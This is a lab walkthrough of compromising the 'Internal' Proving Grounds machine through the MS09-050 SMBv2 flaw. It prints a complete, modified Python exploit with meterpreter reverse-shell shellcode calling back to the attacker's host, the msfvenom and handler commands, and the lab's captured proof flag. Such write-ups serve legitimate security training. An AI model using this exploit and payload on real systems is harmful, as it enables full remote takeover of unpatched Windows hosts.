Internal

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.171.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 00:56 EST
Nmap scan report for 192.168.171.40                                                   
Host is up, received reset ttl 125 (0.11s latency).                
Scanned at 2025-11-11 00:56:22 EST for 95s                                            
Not shown: 65522 closed tcp ports (reset)                                             
PORT      STATE SERVICE       REASON          VERSION                                 
53/tcp    open  domain        syn-ack ttl 125 Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)                                                                   
| dns-nsid:                                                                           
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)                                                                                                                         
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC                   
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn                                                                                                 
445/tcp   open  microsoft-ds  syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)                                      
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Service              
|_ssl-date: 2025-11-11T05:57:57+00:00; 0s from scanner time.                          
| ssl-cert: Subject: commonName=internal                                              
| Issuer: commonName=internal                                                         
| Public Key type: rsa                                                                
| Public Key bits: 2048                                                               
| Signature Algorithm: sha1WithRSAEncryption                                         
| Not valid before: 2025-07-24T21:18:58                                               
| Not valid after:  2026-01-23T21:18:58                                                                                                                                     
| MD5:   d2d9:1772:60cd:2a6b:1cd0:ed66:27ab:b8cd                                      
| SHA-1: d5f0:03cb:2df3:c4c2:b6a7:2f5e:39b2:6c6f:491c:0587                            
| -----BEGIN CERTIFICATE-----                                                         
| MIIC1DCCAbygAwIBAgIQofLukS/50Z5CIQMgxLeN3jANBgkqhkiG9w0BAQUFADAT
<snipped>
|_-----END CERTIFICATE-----
| rdp-ntlm-info: 
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-11-11T05:57:49+00:00
5357/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0 
49152/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49156/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49157/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

<snipped>

We have only smb, and port 5357 which has nothing.

I will check some versioning info via nxc, then run smb-vuln scripts with nmap to search for smb related CVEs:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ nxc smb 192.168.171.40 -u '' -p ''
SMB         192.168.171.40  445    INTERNAL         [*] Windows 6.0 Build 6001 x32 (name:INTERNAL) (domain:internal) (signing:False) (SMBv1:True) 
SMB         192.168.171.40  445    INTERNAL         [+] internal\:

It is an old operating system so we could find a cve for that.

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ sudo nmap -p 135,139,445 --script smb-vuln* 192.168.171.40 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-11 00:59 EST
<snipped>

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-054: false
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

<snipped>

As stated our target is vulnerable, and it is in srv2.sys.

Search for public exploits for that:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ searchsploit srv2.sys                                         
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)                                                                     | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                              | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)                                 | windows/remote/16363.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We will find one, mirror it to our current directory:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ searchsploit -m windows/remote/40280.py           
  Exploit: Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)
      URL: https://www.exploit-db.com/exploits/40280
     Path: /usr/share/exploitdb/exploits/windows/remote/40280.py
    Codes: CVE-2009-3103, CVE-2009-2532, CVE-2009-2526, MS09-050
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Internal/40280.py

Read it to understand what we should adjust to fit our needs, or if it has any malicious data:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ cat 40280.py   
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py

#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does
 not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection 


try:

        target = sys.argv[1]
except IndexError:
        print '\nUsage: %s <target ip>\n' % sys.argv[0]
        print 'Example: MS36299.py 192.168.1.1 1\n'
        sys.exit(-1)

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread  -f python
shell =  ""
shell += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"   #fce8820000006089e531c0648b
<snipped>
shell += "\x53\xff\xd5"

host = target, 445                                                                                                                                                          
                                                                                                                                                                            
buff ="\x00\x00\x03\x9e\xff\x53\x4d\x42"                                                                                                                                    
buff+="\x72\x00\x00\x00\x00\x18\x53\xc8"                                                                                                                                    
buff+="\x17\x02" #high process ID                                                                                                                                           
buff+="\x00\xe9\x58\x01\x00\x00"                                                                                                                                            
buff+="\x00\x00\x00\x00\x00\x00\x00\x00"                                                                                                                                    
buff+="\x00\x00\xfe\xda\x00\x7b\x03\x02"                                                                                                                                    
buff+="\x04\x0d\xdf\xff"*25                                                                                                                                                 
buff+="\x00\x02\x53\x4d"                                                                                                                                                    
buff+="\x42\x20\x32\x2e\x30\x30\x32\x00"                                                                                                                                    
buff+="\x00\x00\x00\x00"*37                                                                                                                                                 
buff+="\xff\xff\xff\xff"*2                                                                                                                                                  
buff+="\x42\x42\x42\x42"*7                                                                                                                                                  
buff+="\xb4\xff\xff\x3f" #magic index                                                                                                                                       
buff+="\x41\x41\x41\x41"*6                                                                                                                                                  
buff+="\x09\x0d\xd0\xff" #return address                                                                                                                                    
                                                                                                                                                                            
#stager_sysenter_hook from metasploit                                                                                                                                       
                                                                                                                                                                            
buff+="\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
<snipped>
buff+="\x61\xc3\x81\xc4\x54\xf2\xff\xff"

buff+=shell

s = socket()
s.connect(host)
s.send(buff)
s.close()
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)

First we need to modify the shellcode to ours, second add parenthesis to the print functions, because we want to use python3, finally prepend b to search row after buff+= to instruct python that those are bytes instead of a string.

Generate our shellcode:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ mv 40280.py exploit.py             

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.187 LPORT=443 EXITFUNC=thread -f python -v shell                                                          
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 375 bytes
Final size of python file: 1929 bytes
shell =  b""
shell += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"
<snipped>
shell += b"\x53\xff\xd5"

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ mousepad exploit.py

Our final script after modification:

# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py

#!/usr/bin/python
#This module depends on the linux command line program smbclient.
#I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
#The idea is that after the evil payload is injected by the first packet, it need to be trigger by an authentication event. Whether the authentication successes or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection


try:

	target = sys.argv[1]
except IndexError:
	print ('\nUsage: %s <target ip>\n' % sys.argv[0])
	print ('Example: MS36299.py 192.168.1.1 1\n')
	sys.exit(-1)

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443  EXITFUNC=thread  -f python
shell =  b""
shell += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64"
shell += b"\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x31\xff\x8b"
shell += b"\x72\x28\x0f\xb7\x4a\x26\x31\xc0\xac\x3c\x61\x7c"
shell += b"\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52"
shell += b"\x8b\x52\x10\x8b\x42\x3c\x57\x01\xd0\x8b\x40\x78"
shell += b"\x85\xc0\x74\x4c\x01\xd0\x50\x8b\x58\x20\x8b\x48"
shell += b"\x18\x01\xd3\x85\xc9\x74\x3c\x49\x31\xff\x8b\x34"
shell += b"\x8b\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38"
shell += b"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58"
shell += b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
shell += b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b"
shell += b"\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12"
shell += b"\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
shell += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8"
shell += b"\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
shell += b"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x2d"
shell += b"\xbb\x68\x02\x00\x01\xbb\x89\xe6\x50\x50\x50\x50"
shell += b"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97"
shell += b"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
shell += b"\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
shell += b"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f"
shell += b"\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68"
shell += b"\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5"
shell += b"\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
shell += b"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
shell += b"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
shell += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff"
shell += b"\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff"
shell += b"\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xe0\x1d\x2a"
shell += b"\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
shell += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00"
shell += b"\x53\xff\xd5"



host = target, 445

buff =b"\x00\x00\x03\x9e\xff\x53\x4d\x42"
buff+=b"\x72\x00\x00\x00\x00\x18\x53\xc8"
buff+=b"\x17\x02" #high process ID
buff+=b"\x00\xe9\x58\x01\x00\x00"
buff+=b"\x00\x00\x00\x00\x00\x00\x00\x00"
buff+=b"\x00\x00\xfe\xda\x00\x7b\x03\x02"
buff+=b"\x04\x0d\xdf\xff"*25
buff+=b"\x00\x02\x53\x4d"
buff+=b"\x42\x20\x32\x2e\x30\x30\x32\x00"
buff+=b"\x00\x00\x00\x00"*37
buff+=b"\xff\xff\xff\xff"*2
buff+=b"\x42\x42\x42\x42"*7
buff+=b"\xb4\xff\xff\x3f" #magic index
buff+=b"\x41\x41\x41\x41"*6
buff+=b"\x09\x0d\xd0\xff" #return address

#stager_sysenter_hook from metasploit

buff+=b"\xfc\xfa\xeb\x1e\x5e\x68\x76\x01"
buff+=b"\x00\x00\x59\x0f\x32\x89\x46\x5d"
buff+=b"\x8b\x7e\x61\x89\xf8\x0f\x30\xb9"
buff+=b"\x16\x02\x00\x00\xf3\xa4\xfb\xf4"
buff+=b"\xeb\xfd\xe8\xdd\xff\xff\xff\x6a"
buff+=b"\x00\x9c\x60\xe8\x00\x00\x00\x00"
buff+=b"\x58\x8b\x58\x54\x89\x5c\x24\x24"
buff+=b"\x81\xf9\xde\xc0\xad\xde\x75\x10"
buff+=b"\x68\x76\x01\x00\x00\x59\x89\xd8"
buff+=b"\x31\xd2\x0f\x30\x31\xc0\xeb\x31"
buff+=b"\x8b\x32\x0f\xb6\x1e\x66\x81\xfb"
buff+=b"\xc3\x00\x75\x25\x8b\x58\x5c\x8d"
buff+=b"\x5b\x69\x89\x1a\xb8\x01\x00\x00"
buff+=b"\x80\x0f\xa2\x81\xe2\x00\x00\x10"
buff+=b"\x00\x74\x0e\xba\x00\xff\x3f\xc0"
buff+=b"\x83\xc2\x04\x81\x22\xff\xff\xff"
buff+=b"\x7f\x61\x9d\xc3\xff\xff\xff\xff"
buff+=b"\x00\x04\xdf\xff\x00\x04\xfe\x7f"
buff+=b"\x60\x6a\x30\x58\x99\x64\x8b\x18"
buff+=b"\x39\x53\x0c\x74\x2b\x8b\x43\x10"
buff+=b"\x8b\x40\x3c\x83\xc0\x28\x8b\x08"
buff+=b"\x03\x48\x03\x81\xf9\x6c\x61\x73"
buff+=b"\x73\x75\x15\xe8\x07\x00\x00\x00"
buff+=b"\xe8\x0d\x00\x00\x00\xeb\x09\xb9"
buff+=b"\xde\xc0\xad\xde\x89\xe2\x0f\x34"
buff+=b"\x61\xc3\x81\xc4\x54\xf2\xff\xff"

buff+=shell

s = socket()
s.connect(host)
s.send(buff)
s.close()
#Trigger the above injected code via authenticated process.
subprocess.call("echo '1223456' | rpcclient -U Administrator %s"%(target), shell=True)

Setup multi handler to receive the connection from the target:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ msfconsole -q                   
msf > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
lhost => tun0
msf exploit(multi/handler) > set lport 443
lport => 443                   
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.45.187:443

Run the exploit:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ python3 exploit.py                                                                                                              

Usage: exploit.py <target ip>

Example: MS36299.py 192.168.1.1 1


┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Internal]
└─$ python3 exploit.py 192.168.171.40                                                                                               
Password for [WORKGROUP\Administrator]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Wait for like 2 minutes, and then:

[*] Sending stage (188998 bytes) to 192.168.171.40
[*] Meterpreter session 1 opened (192.168.45.187:443 -> 192.168.171.40:49159) at 2025-11-11 01:03:37 -0500
                                           
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Get the flags:

meterpreter > shell
Process 3532 created.                   
Channel 1 created.                       
Microsoft Windows [Version 6.0.6001]                                                  
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.
                                                                                      
C:\Windows\system32>cd \Users\Administrator\Desktop
cd \Users\Administrator\Desktop
                                                                                      
C:\Users\Administrator\Desktop>dir
dir                             
 Volume in drive C has no label.
 Volume Serial Number is B863-254D
                                           
 Directory of C:\Users\Administrator\Desktop
                                           
02/03/2011  07:51 PM    <DIR>          .
02/03/2011  07:51 PM    <DIR>          ..
05/20/2016  09:26 PM                32 network-secret.txt            
11/10/2025  09:56 PM                34 proof.txt
               2 File(s)             66 bytes
               2 Dir(s)   4,012,036,096 bytes free       
                                           
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
901cbada3e4775d1e3e18cada7174a96

PreviousMice NextAlgernon

Last updated 2 months ago

hashtagEnumeration:

hashtagPort Scanning:

Enumeration:

Port Scanning: